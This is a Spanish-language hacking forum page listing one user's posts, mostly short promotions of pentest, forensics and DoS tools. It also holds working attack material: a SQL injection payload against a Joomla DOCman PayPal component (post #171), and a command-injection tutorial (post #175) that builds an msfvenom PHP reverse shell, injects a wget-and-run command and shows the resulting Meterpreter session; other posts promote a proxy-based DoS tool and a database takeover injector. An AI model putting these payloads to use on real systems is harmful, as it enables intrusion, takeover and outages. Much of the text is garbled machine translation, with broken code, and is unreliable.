Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - ZanGetsu

#161
Pentesting / DomainHostingView
Abril 17, 2013, 02:28:13 PM
DomainHostingView es una utilidad para Windows que recoge una amplia información acerca de un dominio mediante una serie de consultas WHOIS y DNS, y genera un informe HTML que puede visualizarse en cualquier navegador Web.
incluye la información que se muestra en el informe de DomainHostingView: la empresa de alojamiento o centro de datos que aloja el servidor web, servidor de correo y el servidor de nombres de dominio (DNS) del dominio especificado, la fecha de creación / cambiado / expirar del dominio, el propietario del dominio, el registrador de dominio que registró el dominio, la lista de todos los registros DNS, y mucho más ...


Web : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Descarga: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#162
GNU/Linux / PALADIN - Free suite Forense
Abril 17, 2013, 02:21:57 PM
Adquisición Forense Vista previa y Análisis - simplificado!

PALADIN es una modificación de la distribución Linux Live basada en Ubuntu que simplifica el proceso de creación de imágenes forenses de manera forense de sonido. PALADIN fue diseñado con el entendimiento de que muchos de los encargados de la creación de imágenes forenses no se siente cómodo con el uso de la línea de comandos, pero todavía quiere utilizar el poder de Linux. PALADIN también fue diseñado con el entendimiento de que muchas agencias o compañías tienen presupuestos limitados.

PALADIN  Características principales


Inicie PCs y Macs Intel estándar de manera forense de sonido (incluyendo la mayoría de los Macs Intel, incluida la MacBook Air)!
Imagen de varios formatos, incluyendo Perito (. E01), EWF2 (. EX01), Imagen de Apple Disk (. Dmg), RAW (. Dd), SMART y AFF!
Imagen directamente como un formato de disco virtual (. Vmdk)!
Cree clones de disco duro!
Crear dos imágenes forenses o clones al mismo tiempo en el mismo formato o diferente!
Simplificación de GUI Toolbox!
Rápido y ligero entorno de escritorio XFCE!
Imagen a través de una red!
Dar formato a cualquier unidad como NTFS, HFS +, FAT32, exFAT y EXT4!
Crear una imagen forense de sólo el Slack espacio no asignado, el espacio libre y archivo!
Limpie rápidamente (esterilizar), verificar y medios de hash!
De búsqueda y presentación a la prensa por nombre de archivo, palabras clave o tipos MIME!
Progress Live Viewer Log!
Capacidad para guardar los registros a cualquier destino!
Capacidad de crear una imagen forense solo o dividir archivos forenses imagen!
Administrador de discos permite una fácil visualización de todos los medios de comunicación conectados y su estado!
Disk Manager códigos de color volúmenes montados para facilitar su identificación!
Imagen Mounter permite el montaje de imágenes forenses en PALADIN!
Enhanced encontrar características que permiten la búsqueda de un volumen entero o un solo directorio!
Capacidad de búsqueda de varios directorios al mismo tiempo!
PALADIN ahora tiene algunas de las herramientas de código abierto más populares forenses en su pecho herramienta forense!
Capacidad para realizar exámenes forenses completos usando Autopsia / Sleuthkit o DFF!
Capacidad para recuperar las contraseñas de la memoria utilizando lanzamiento!
Capacidad para analizar los archivos de copia de seguridad mediante el Analizador de iOS iPhone!
y mucho, mucho más!

Caja de herramientas FORENSE - Incluye software de código abierto!


Clamscan
Bulk Extractor
Principal
Photorec
Bisturí
SQLite Database Browser
TrueCrypt
Autopsy Browser
DFF
Md5deep
Bendice Hex Editor
DC3DD
DCFLDD
Pasco
EML Visor
ReadDBX
ReadOE
ReadPST
Comienzo
ExifTool
LinkInfo
Log2Timeline
RifiUtii
IPDDump
Analizador de iPhone
Wireshark
Registro Ripper
Ser más astuto que

Para descargar Paladin, debemos registrarnos, luego de eso la descargamos desque aqui:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Mas info: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos !
#163
Java / Dos Port Groper
Abril 17, 2013, 02:15:40 PM
Hola a todos, les paso a dejar esta herramienta Dos, en realidad no me gusta
mucho el dos, pero es bueno tener nuestro Arsenal xd.

Descripción

Groper es una negación de código abierto de la herramienta de servicio escrito en Java. Funciona mediante el uso de proxies como bots. Groper puerto típico de uso: 1. Se puede utilizar para firewalls de referencia para IP prohibición de ataques DoS a un puerto específico. 2. Se puede utilizar para distorsionar la información de seguimiento de sitio web (como Google Analytics). 3. Se puede utilizar para distorsionar la página web hits (o visitas por día). 4. Se puede bajar solo (no agrupado o agrupado mal) servidores. Aunque Puerto Groper puede ser utilizado para ataques de denegación de servicio; tengo absolutamente ninguna responsabilidad u obligación por los que utilizan esta herramienta de forma. Todas las compilaciones después de 3,2 (incluyendo 3,2) requieren java 7. Groper Puerto v2 está construido con Java 6. Puerto Groper v1 está escrito en python y requiere Python 2.7 (versión exe no requiere Python 2.7 para ser instalado)


Características

Utiliza proxies como bots, por lo que no necesita un botnet para ataques DDoS
GUI simple y elegante
Independiente de la plataforma (probado sólo en Windows)
Multi-threaded (100% sensible GUI), construida según el modelo de evento Swings. GUI no se bloqueará en marcha, incluso cuando se ejecuta.
Puede spam / inundación de un sitio web para aumentar los accesos y / o distorsionar la información de seguimiento
Es capaz de negar el servicio en los servidores sin que se distribuyen
Capaz de elegir qué agente de usuario de las conexiones vienen de
Capaz de establecer el tiempo de espera de conexión
Validación lista Proxy
Configuración intuitiva y estadísticas de conexión
En la actualidad existe un acuerdo para usar este software (no intrusiva). El uso del software implica que usted ha leído y acepta el acuerdo.

Para abrirlo pondremos, abrir con, otra aplicacion, comando personalizado, java -jar

Para efectuar un ataque debemos cargar algunos proxys

Descarga: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#164
hola amigos, la siguiente herramienta esta escrita en python y cuenta con las siguientes
caracteristicas:


Aplicaciones Web Vuln Dorker / escáner para pentester amateur.

Cubierta LFI, RFI, SQLi y XSS
Buscador de Administración / login
subdominio buscador
en línea / fuera de línea galleta MD5
Apoderado
Búsqueda de IP local
Interfaz amigable


-[1]-  SQLi
-[2]-  LFI
-[3]-  XSS
-[4]-  RFI
-[5]-  Proxy
-[6]-  Admin Page Finder
-[7]-  Sub Domain Scan
-[8]-  Dictionary MD5 cracker
-[9]-  Online MD5 cracker
-[10]- Check your IP address



Web para descargas: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#165
Python / peePDF en Backtrack
Abril 14, 2013, 12:20:48 AM
Hola a todos, bueno como ya es conocido hoy en dia
los PDF no son exactamente archivos con informacion e imagenes para nuestra lectura,
ya sabeis a lo que me refiero...
Bueno la siguiente herramienta peepdf nos ayudara en la tarea
de analisis de los archivos PDF

peepdf es una herramienta para explorar los archivos PDF con el fin de averiguar si el archivo puede ser dañino o no.

Las principales funcionalidades de peepdf son los siguientes:

Análisis

Decodificaciones: hexadecimales, octales, nombre objetos
Más filtros usados
Las referencias en los objetos y en donde se hace referencia a un objeto
Cadenas de búsqueda (incluidas las series)
Estructura física (offsets)
Estructura de árbol lógico
Metadatos
Modificaciones entre versiones (cambios)
Comprimido objetos (objetos corrientes)
Análisis y modificación de Javascript (Araña): unescape, reemplazar unirse
Shellcode análisis (wrapper sctest, Libemu)
Variables (conjunto de comandos)
La extracción de versiones anteriores del documento


Creación / Modificación

Básico de creación de PDF
Creación de PDF con Javascript ejecutado wen se abre el documento
Creación de flujos de objeto a comprimir los objetos
Embedded PDFs
Cuerdas y ofuscación nombres
PDF de salida con formato incorrecto: sin endobj, basura en la cabecera, la cabecera está mal ...
Filtros modificación
Objetos modificación


Usage: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta [options] PDF_file

Version: peepdf 0.1 r92

Options:
  -h, --help            show this help message and exit
  -i, --interactive     Sets console mode.
  -s SCRIPTFILE, --load-script=SCRIPTFILE
                        Loads the commands stored in the specified file and
                        execute them.
  -f, --force-mode      Sets force parsing mode to ignore errors.
  -l, --loose-mode      Sets loose parsing mode to catch malformed objects.
  -u, --update          Updates peepdf with the latest files from the
                        repository.
  -v, --version         Shows program's version number.
  -x, --xml             Shows the document information in XML format.


En Backtrack podemos encontrarlo en: cd /pentest/forensics/peepdf


Si deseas descargarlo aqui esta el link : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#166
Hola a todos, paseando la internet
me encontre con esta  Herramienta muy util y compacta.

Su Nombre es MaxISploit, el cual se compone por Herramientas de
SQL inyeccion, Dork Scanner, Admin Finder & Xss Scan

Algunas Imagenes de la Herramienta a continuacion:

Bueno es un .exe por tanto para Windows, para hacerlo correr en Backtrack, daremos los permisos 777 (chmod 777)



Luego de eso ya la abrimos normal



Descarga : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Video:
#167
Windows / Webslayer - Web application bruteforcer
Abril 11, 2013, 12:45:58 AM

WebSlayer es una herramienta diseñada para ataques de fuerza bruta aplicaciones Web, que puede ser utilizado para la búsqueda de recursos no vinculados (directorios, servlets, scripts, archivos, etc), la fuerza bruta parámetros GET y POST, bruteforce Formularios parámetros (usuario / contraseña), fuzzing, etc Las herramientas tiene un generador de carga útil y un analizador de resultados fácil y de gran alcance.

Puede llevar a cabo ataques como:
Predecible localizador de recurso, la recursividad soportado (Discovery)
Ingresar forma de fuerza bruta
Sesión de fuerza bruta
Parámetro fuerza bruta
Parámetro fuzzing y la inyección (XSS, SQL)
Autenticación básica y NTLM ataques de fuerza bruta

Características :
Recursión
Codificaciones: 15 codificaciones de apoyo
Autenticación: soporta NTLM y Basic
Cargas útiles múltiples: se puede utilizar 2 cargas útiles en diferentes partes
El soporte de proxy (autenticación compatibles)
Para la localización de recursos predecibles que tiene: recursividad, las extensiones comunes, la detección de códigos no estándar
Varios filtros para mejorar el rendimiento y para producir resultados más limpios
Filtros de directo
Multithreads
Sesión de ahorro
Navegador integrado (WebKit)
Retardo de tiempo entre solicitudes
Ataque de equilibrio a través de múltiples proxies
Diccionarios predefinidos para localización de recursos predecibles, basadas en servidores conocidos (gracias a Dark Raver)

Este sitio será utilizado para albergar los archivos del proyecto, y para la gestión de asuntos.



Descarga: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Web Oficial: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#168
Python / Theharvester - Recopilacion de Informacion
Abril 11, 2013, 12:00:53 AM

El objetivo de este programa es reunir a mensajes de correo electrónico, subdominios, los anfitriones, los nombres de los empleados, puertos abiertos y las banderas de diferentes fuentes públicas como los motores de búsqueda, servidores y bases de datos de la clave PGP ordenador SHODAN.

Esta herramienta está diseñada para ayudar a los probadores de penetración en las primeras etapas de la prueba de penetración con el fin de entender la huella de cliente en Internet. También es útil para cualquier persona que quiere saber lo que un atacante puede ver sobre su organización.

Esta es una reescritura completa de la herramienta con nuevas características como:
Las demoras entre la solicitud

Todas las fuentes de búsqueda
Verificador de host virtual
Enumeración Activa (enumeración DNS, las búsquedas inversas, la expansión TLD)
Integración con la base de datos SHODAN ordenador, para obtener los puertos abiertos y pancartas
Guardar para XML y HTML
Gráfico básico con estadísticas
Las nuevas fuentes

Descubrimiento pasiva:

Google: motor de búsqueda de Google - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Google y los perfiles: motor de búsqueda de Google, búsqueda específica para los perfiles de Google

Bing: motor de búsqueda de Microsoft - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Bingapi: motor de búsqueda de Microsoft, a través de la API (es necesario agregar la clave en el archivo de descubrimiento / No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)

Pgp: servidor PGP key - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Linkedin: google motor de búsqueda, búsqueda específica para los usuarios de Linkedin

Shodan: Computer Shodan motor de búsqueda, buscará los puertos y la bandera de los hosts descubiertos ( No tienes permitido ver los links. Registrarse o Entrar a mi cuenta )

Vhost: Bing hosts virtuales búsqueda

Descubrimiento activo:

DNS fuerza bruta: este plugin se ejecutará un bruto diccionario enumeración fuerza

Búsqueda DNS inversa: búsqueda inversa de IP ha descubierto con el fin de encontrar los nombres de host

DNS TDL expansión: TLD bruta diccionario enumeración fuerza

Por favor, lea el archivo README para obtener más información.

Última versión en el repositorio de subversion


Usage: theharvester options

       -d: Domain to search or company name
       -b: Data source (google,bing,bingapi,pgp,linkedin,google-profiles,people123,jigsaw,all)
       -s: Start in result number X (default 0)
       -v: Verify host name via dns resolution and search for virtual hosts
       -f: Save the results into an HTML and XML file
       -n: Perform a DNS reverse query on all ranges discovered
       -c: Perform a DNS brute force for the domain name
       -t: Perform a DNS TLD expansion discovery
       -e: Use this DNS server
       -l: Limit the number of results to work with(bing goes from 50 to 50 results,
    -h: use SHODAN database to query discovered hosts
            google 100 to 100, and pgp doesn't use this option)

Examples:./theharvester.py -d No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -l 500 -b google
         ./theharvester.py -d No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -b pgp
         ./theharvester.py -d microsoft -l 200 -b linkedin



Descarga: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#169
Pangolin es una prueba de penetración, Inyección SQL herramienta de prueba de seguridad de base de datos. Encuentra Inyección SQL vulnerabilities.Its objetivo es detectar y tomar informarle de inyección SQL vulnerabilidades en aplicaciones web. Una vez que se detecta una inyección SQL en el host de destino, el usuario puede elegir entre una variedad de opciones para realizar un extenso back-end de gestión de base de datos de huellas dactilares sistema, recuperar usuarios DBMS sesión y base de datos, los usuarios enumerar, los hashes de contraseñas, privilegios, bases de datos, volcado tablas específicas enteras o usuario "s DBMS / columnas, ejecutar su propia sentencia de SQL, leer determinados archivos del sistema de archivos y mucho más.

Esta Hecha para windows, imgen:


Web Oficial para descargas y video demostraciones : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#170
Python / MultiInjector v0.3
Abril 09, 2013, 03:59:52 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, cuenta con las siguientes opciones:

1) Automatic defacement:
Try to concatenate a string to all user-defined text fields in DB

2) Run OS shell command on DB server:
Run any OS command as if you're running a command console on the DB machine

3) Run SQL query on DB server:
Execute SQL commands of your choice

4) Enable OS shell procedure on DB:
Revive the good old XP_CMDSHELL where it was turned off
(default mode in MSSQL-2005)

5) Add administrative user to DB server with password: T0pSeKret
Automagically join the Administrators family on DB machine

6) Enable remote desktop on DB server:
Turn remote terminal services back on...

- Fixed nvarchar cast to varchar. Verified against MS-SQL 2000
- Added numeric / string parameter type detection
- Improved defacement content handling by escaping quotation marks
- Improved support for Linux systems
- Fixed the "invalid number of concurrent connections" failure due to non-parameterized URLs

Requerimientos:
* Python>= 2.4
* Pycurl (compatible with the above version of Python)
* Psyco (compatible with the above version of Python)

Mas Info sobre su uso: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Descarga: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#171
Hola a todos, les paso a dejar una vulnerabilidad
en un complemento de Joomla llamado Docman Paypal, el cual salio
hace poco en 1337day, dicho complemento es de pago por tanto
me impidio a hacer un tutorial (hasta encontrar algun joomla con ese complemento)
pero si les traigo la Injeccion e Info:

#######################################################
#
#  Joomla Component DOCman PayPal <= (id) SQL injection Vulnerability
#
#######################################################
# Author : ByEge
# Author Blog : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
# Date : 28.03.2013
# Download script : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#######################################################
 
# test site vulnerability : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
 
# SQL Union Code : index.php?option=com_docmanpaypal&task=file&id=4+and+false+UnIOn+sELEct+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,CHAR(60,104,49,62,66,121,69,103,101,60,104,49,62),44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65--
 
#######################################################

El complemente se puede encontrar en la siguiente web y esta disponible para
versiones de Joomla (hasta 2.5): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
con un video tutorial de instalacion, sin mas que decir, disfrutenlo, Saludos !
#172
Ruby / PentBox Security Suite
Abril 02, 2013, 02:36:19 AM
PenTBox es una suite de seguridad, paquetes de seguridad y la estabilidad de las herramientas de prueba orientados a las redes y sistemas.
Programación en Ruby y orientado a GNU / Linux, aunque es compatible con Windows, MacOS y sistemas en los que cada Rubí trabaja.
Está libre, licenciado bajo GNU / GPLv3.

Algunas Caracteristicas de su Ultima version:

Nuevas características:
- Ejecución de comandos en gets (STDIN) implementado. (! Comandos)
- Honeypot ahora muestra IP del atacante y el puerto (thx Shyish)
. - Incluye las opciones de registro
. - Lista de palabras es más grande ahora
- Incluido "back" opción en los menús.
Nuevas herramientas:
- Incluido área nueva, herramientas Web.
- Incluido nuevo módulo de geolocalización dirección MAC (samy.pl).
- Incluido nuevo módulo HTTP directorio fuerza bruta.
- Incluido nuevo módulo HTTP comunes archivos de fuerza bruta.
- Incluido exploits para DOS
[otros / http] Conmutador 3Com SuperStack DoS
[otros / http] Los routers 3Com OfficeConnect DoS (Content-Type)
[windows / ftp] Windows 7 IIS7.5 Ftpsvc UNAUTH'D DoS
[windows / ftp] Solar FTP Server 2.1 DoS
[windows / pptp] MS02-063 PPTP con formato incorrecto de Control de Datos Kernel DoS
[windows / smb] Windows Vista / 7 SMB2.0 Negociar protocolo de petición DoS BSOD
- pb_update.rb incluido para actualizar PenTBox desde el repositorio SVN.
bugfixing:
-. Solucionado el problema con la API SHODAN
. - Eliminado l33t habla y el menú adicional
- mejorando la comprobación de permisos, ahora se hace por euid, no nombre de usuario (thx r4mosg)

Probando en Backtrack:



Cd Desktop (en mi caso), cd pentbox
ruby pentbox.rb


Probando las opciones disponibles
Web Oficial: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Descarga para Linux: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos
#173
Bugs y Exploits / Netsparker
Abril 01, 2013, 10:33:17 PM
Que es Netsparker?

Netsparker es el único falso positivo sin aplicación web escáner de seguridad. Simplemente apunte a su sitio web y automáticamente descubrir las fallas que podría dejar peligrosamente expuesta.

Tiene un periodo Gratis de 15 dias ya que es de pago, en realidad no se si habrá algun crack para
esta herramienta ya que no soy muy afiliado a Windows, si alguien sabe de algo agradecería lo diera a conocer.

Imagenes de la Herramienta:



Web Oficial para descargas: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos !!
#174
Ruby / IsCanner 0.7
Abril 01, 2013, 02:10:56 AM
iScanner es una herramienta gratuita de código abierto que detecta y elimina códigos maliciosos (iframes sospechosos, ofuscado, el uso de javascript peligroso eval y escapar, ...) en las páginas web.

Esta herramienta ha sido programada por iSecur1ty usando un lenguaje de programación de Ruby.

Su Uso es el siguiente:

Primero descargamos la Herramienta:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Luego vamos al directorio en mi caso Escritorio : cd /Desktop/iscanner-0.7

. / iScanner [opciones]


-R, - distancia [URL]
Escanear página web remoto / sitio web
-F, - file [ARCHIVO]
Escanear un archivo específico
-F, - carpeta [directorio]
Analizar una carpeta específica
-E, - extensiones [ext: ext: ext]
Las extensiones que desea analizar
-D, - base de datos [base de datos]
Seleccione el archivo de base de datos
-M, - malware [ARCHIVO]
Escanear un código de malware específico
-O, - output [LOG-FILE]
Salida de archivo de registro
-M, - correo electrónico [EMAIL-DIRECCIÓN]
Enviar el informe a la dirección de correo electrónico
-C, - limpio [LOG-FILE]
Limpiar los archivos infectados
-B, - copia de seguridad
Copia de seguridad de archivos infectados
-R, - restauración [BACKUP-FOLDER]
Restaurar los archivos infectados
-A, - auto-limpieza
Activar el modo de limpieza automática
-D, - debug
Activar el modo de depuración
-Q, - quiet
Activar el modo silencioso
-S, - enviar [malicioso ARCHIVO]
Enviar archivo malicioso para los análisis
-U, - update
Actualizar a la última versión iScanner
-U, - update-db
Actualización de la base de datos de firmas sólo
-V, - version
Imprime el número de versión
-H, - help
Mostrar este mensaje

Tambien podemos instalarlo y acceder mediante consola en /etc/iscanner/ con el comando ./installer -i

Imagenes:


y los reportes se generaran en nuestra carpeta "iscanner-0.7"


Saludos !
Web Oficial :
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#175
Hacking / Command-injection-to-shell
Abril 01, 2013, 02:09:05 AM
Introducción

Descripción

En este tutorial, aprenderás cómo tomar el control de un servidor que es vulnerable a una vulnerabilidad de inyección de comandos.
Medio ambiente

El siguiente tutorial ha sido probado en el siguiente entorno:
atacante:
Dirección IP: 192.168.1.43
Distribución: BackTrack 5 R3
objetivo
Dirección IP: 192.168.1.16
Distribución: Debian 6
Ejemplo

Código

Código: text
<html>
<head>
<title> ping host </ title>
</ Head>
<body>
<form method="get" action="">
  <input type="text" /> name="host"
  <input type="submit" value="ping host" />
</ Form>
<? Php
if (isset ($ _GET ['host'])) {
  $ Salida = shell_exec ("ping-c1" $ _GET ['host'].);
  echo "<pre> $ salida </ pre>";
}
?>
</ Body>
</ Html>

El uso normal

En el uso normal, esta aplicación se supone para generar el resultado del comando ping contra un host solicitado:

Vulnerabilidad

Este código es vulnerable, ya que no desinfectar las entradas del usuario. Es posible inyectar otros comandos:

Explotación

Crear shell con msfvenom
Vamos a aprovechar esta vulnerabilidad para descargar un shell inversa PHP. Pero en primer lugar crear el shell con msfvenom :
root @ bt: ~ # msfvenom-p php / meterpreter / reverse_tcp-f lhost prima = 192.168.1.43 lport = 4050> / var / www / shell.txt
root @ bt: ~ # cabeza / var / www / shell.txt
# <? Php

error_reporting (0);
# El controlador de carga sobrescribirá con el lhost correcto antes de enviar
# A la víctima.
$ Ip = '192 .168.1.43 ';
$ Port = 4050;
$ Ipf = AF_INET;

si (== FALSE strpos ($ ip,! ":")) {
Como se puede ver, la primera línea está comentada. Vamos a quitar el comentario:
root @ bt: ~ # sed-i '¡¯ s / # <php / <php /' / var / www / shell.txt
Iniciar servidor web en la máquina del atacante
Aunque sería posible alojar nuestro shell PHP en una tercera parte, es conveniente en nuestro tutorial de ser el anfitrión de la máquina del atacante directamente. Vamos a comenzar nuestro servidor web:
root @ bt: ~ # servicio apache2 inicio
* Inicio del servidor web apache2 [OK]
Comience escuchando en el puerto 4050 de la máquina del atacante
De BT5, abramos nuestro oyente:
root @ bt: ~ # msfconsole
msf> use multi / handler
exploit msf (manejador)> set payload php / meterpreter / reverse_tcp
msf exploit (manejador)> set lhost 192.168.1.43
msf exploit (manejador)> set lport 4050
msf exploit (manejador )> explotar

  • Started inversa controlador en 192.168.1.43:4050
  • A partir del controlador de carga útil ...
    Descarga shell desde el host vulnerable
    Vamos a aprovechar la vulnerabilidad y descargar el shell del servidor web del atacante. Escriba el siguiente comando en el campo "máquina":
    ; No tienes permitido ver los links. Registrarse o Entrar a mi cuenta wget-O / tmp / shell.php; php-f / tmp / shell.php
    El comando anterior descarga shell.txt como shell.php en el directorio / tmp y ejecutar el shell php (php-f / tmp / shell.php)
    Pruebe el shell inversa
    Ahora tenemos un meterpreter:
    ...
  • Envío etapa (38791 bytes) para 192.168.1.16
  • Periodo de sesiones Meterpreter 1 abierto (192.168.1.43:4050 -> 192.168.1.16:40107) en 05/05/2012 21:02:34 -0400

    meterpreter> sysinfo
    Equipo: snort
    OS: Linux snort 2.6.32-5-686 # 1 SMP Lun Ene 16 16:04:25 UTC 2012 i686
    Meterpreter: php / php
    meterpreter> shell
    Proceso 3845 creado.
    Canal creado 0.
    / Sbin / ifconfig
    eth0 Link a encap: Ethernet HWaddr 00:0 c: 29:97:32:0 f 
              inet addr: 192.168.60.129 Bcast: 192.168.60.255 Máscara: 255.255.255.0
              inet6 addr: fe80 :: 20c: 29ff: fe97: 320f/64 Alcance: Enlace
              UP BROADCAST RUNNING MULTICAST MTU: 1500 Métrica: 1
              RX packets: 530 errors: 0 caído: 0 sobrecostos: 0 frame: 0
              TX paquetes: 285 errores: 0 caído: 0 sobrecostos: 0 carrier: 0
              colisiones: 0 txqueuelen: 1000
              RX bytes: 62923 (61.4 KiB) TX bytes: 31150 (30.4 KiB)
              Interrupción: 19 Dirección base: 0x2000

    eth1 Enlace encap: Ethernet HWaddr 00:0 c: 29:97:32:19 
              inet addr: 192.168.1.16 Bcast: 192.168.1.255 Máscara: 255.255.255.0
              inet6 addr: 2a01: e35: 8b15: 3430:20 c: 29ff: fe97: 3219/64 Scope: Global
              inet6 addr: fe80 :: 20c: 29ff: fe97: 3219/64 Alcance: Vínculo
              UP BROADCAST RUNNING MULTICAST MTU: 1500 Métrica: 1
              RX packets: 9694 errors: 0 caído: 0 sobrecostos: 0 frame: 0
              TX paquetes: 3451 errores: 0 caído: 0 sobrecostos: 0 carrier: 0
              colisiones: 0 txqueuelen: 1000
              RX bytes: 2119587 (2,0 MiB) TX bytes: 1297681 (1.2 MiB)
              Interrupción: 16 Dirección base: 0x2080

    lo Link encap: Bucle local 
              inet addr: 127.0.0.1 Máscara: 255.0.0.0
              inet6 ::: 1/128 Alcance: Anfitrión
              ARRIBA LOOPBACK RUNNING MTU: 16436 Metric: 1
              RX packets: 2597 errors: 0 caído: 0 sobrecostos: 0 frame: 0
              TX paquetes: 2597 errores: 0 caído: 0 sobrecostos: 0 carrier: 0
              colisiones: 0 txqueuelen: 0
              RX bytes: 365075 (356.5 KiB) TX bytes: 365075 (356.5 Kb)

    Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

    Observa Mejor el Post Aqui : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#176

CAT está diseñado para facilitar la aplicación manual web para pruebas de penetración más complejos y exigentes tareas de la aplicación de prueba. Se elimina algunos de los elementos más repetitivas del proceso de prueba, permitiendo que el tester para centrarse en aplicaciones individuales, lo que les permite llevar a cabo una prueba mucho más completa.

COMPONENTES CLAVE

CAT ofrece características que permiten una amplia variedad de métodos de prueba que llevará a cabo:

Repetidor Request - Se usa para repetir una única solicitud
Proxy - Classic apoderado Inline
Fuzzer - Permite lote de pruebas que se envía a un servidor de ataques de fuerza bruta fuzzing parámetro, navegación forzada, etc
Iniciar sesión - Ver una lista de peticiones a clase, etc repita búsqueda Permite una secuencia de solicitudes que se repiten y modificados.
Autenticación Checker - Dos sincronizado proxies que pueden ser utilizados para comprobar los controles de autenticación y autorización.
SSL Checker - Solicitar una página específica con diversos sistemas de cifrado SSL y versiones.
Bloc de notas - Un editor de texto / RTF que se puede utilizar como un bloc de notas para las conversiones etc
Web Browser - Un navegador web integrado con proxy pre-configurada sobre la base de motor de renderización del Explorador de Internet.
Addons - libre acceso API / SDK para extender CAT con funcionalidades adicionales.

Imagenes de la Tool en Windows:

Interfaz :

Auto Tester:

Callab:

Proxy:

Web Oficial: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Descarga:
Código: text
http://www.contextis.com/files/cat-mono-v1.tar.gz
#177


Con la herramienta Pytbull puede asegurarse que sus IDS / IPS detecta y bloquea el tráfico no deseado es probarlo con cargas útiles y herramientas específicas.

Suministra cerca de 300 pruebas agrupadas en 9 módulos de prueba:
clientSideAttacks: este módulo utiliza un shell inversa para proporcionar el servidor con instrucciones para descargar archivos maliciosos remotos. Este módulo comprueba la capacidad de los IDS / IPS para proteger contra ataques del lado del cliente.
testRules: Pruebas de reglas básicas. Estos ataques se supone para ser detectados por las Normas se envían con los IDS / IPS.
badTraffic: no compatibles con RFC paquetes se envían al servidor para probar cómo se procesan los paquetes.
fragmentedPackets: varias cargas útiles fragmentados se envían al servidor para comprobar su capacidad para recomponer y detectar los ataques.
multipleFailedLogins: pruebas de la capacidad del servidor para rastrear varios inicios de sesión fallidos (por ejemplo, FTP). Hace uso de reglas personalizadas en Snort y Suricata.
evasionTechniques: varias técnicas de evasión se utilizan para comprobar si los IDS / IPS puede detectar.
shellcodes: enviar shellcodes diferentes para el servidor en el puerto 21/tcp para poner a prueba la capacidad del servidor para detectar / rechazar shellcodes.
denialOfService: pone a prueba la capacidad de los IDS / IPS para proteger contra los intentos de denegación de servicio
pcapReplay: permite reproducir archivos pcap

Es fácilmente configurable y puede integrar nuevos módulos en el futuro.

Hay básicamente 6 tipos de pruebas:

socket: abrir un socket en un puerto determinado y enviar las cargas útiles para el destino remoto en ese puerto.
comando: enviar comandos al destino remoto con el No tienes permitido ver los links. Registrarse o Entrar a mi cuenta () de Python.
scapy: enviar cargas útiles especiales elaborados sobre la base de la sintaxis Scapy
varios inicios de sesión fallidos: abrir un socket en el puerto 21/tcp (FTP) y tratar de iniciar sesión con credenciales de 5 veces malas.
ataques del lado del cliente: utilizar un shell inversa en el destino remoto y enviar comandos al mismo para que sean procesados ​​por el servidor (normalmente comandos de wget).
repetición pcap: permite reproducir el tráfico basado en archivos pcap

Probando la Herramienta en Backtrack :

Vamos al directorio del la tool en mi caso
Desktop/pytbull
Y ingresamos ./pytbull el cual nos dara 3 opciones
Si vamos a realizar el primer scan damos a la opc. 1

Luego de dar la opcion "1" nos solicitara la url a escanear
pondremos lo siguiente
./pytbull -t (web url) como en la img. se muestra


Nuevamente le damos a la opc. 1 y
en la parte de la pregunta (aceptamos con la letra "y")
y comenzara a verificar.

Terminado el scan, pondremos nuevamente en consola como en el inicio
./pytbull , solo que esta vez daremos la opcion 2 en la cual se abrira el localhost
para darnos los reportes




Mas Informacion :
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Descarga:
Código: text
http://sourceforge.net/projects/pytbull/files/pytbull-2.0.tar.bz2/download?use_mirror=ufpr


PD: las img. se ven mas grandes en mi blog : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta mismo tema, saludos
#178
Hacking / Thc SSL Dos
Marzo 23, 2013, 06:59:14 PM
_____________ ___  _________
     \__    ___/   |   \ \_   ___ \
       |    | /    ~    \/    \  \/
       |    | \    Y    /\     \____
       |____|  \___|_  /  \______  /
                     \/          \/

